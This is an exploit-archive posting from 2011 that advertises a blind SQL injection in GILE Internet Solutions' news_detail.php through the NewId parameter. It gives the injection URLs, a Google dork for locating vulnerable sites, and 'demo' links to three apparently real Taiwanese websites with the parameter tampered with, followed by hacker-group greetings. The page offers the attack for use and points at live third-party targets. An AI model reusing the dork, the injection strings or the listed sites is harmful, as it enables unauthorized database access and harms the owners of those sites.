Home / exploitsPDF  

GILE Internet Solutions SQL Injection

Posted on 19 August 2011

#Exploit Title: GILE internet solutions (/news_detail.php?NewId=) Blind Sql Injection Vulnerability #date: 19/08/2011 #author: CriminalCoder #home Page: http://www.rootarea.org * http://www.el-kaide.com #my bl0g: http://beyz4de.wordpress.com #contact: criminalcoder[at]hotmail[Dot]de #vendor: http://www.gile.com.tw/ #version: N/N #Category:: webapps #google d0rk: inurl:".tw/news_detail.php?NewId=" #tested on: Windows XP SP2*********************************** Exploit http://localhost/[path]/news_detail.php?NewId=1'http://localhost/[path]/news_detail.php?NewId=[blind here] Demos http://www.kangfu.com.tw/news_detail.php?NewId='4http://www.sprites.com.tw/news_detail.php?NewId='4www.ju-feng.com.tw/news_detail.php?NewId='6 GreetZ;[NosLeeP]<>[CodeMaster]<>[3spi0n]<>[by_musti]<>[Vezir.04]

 

TOP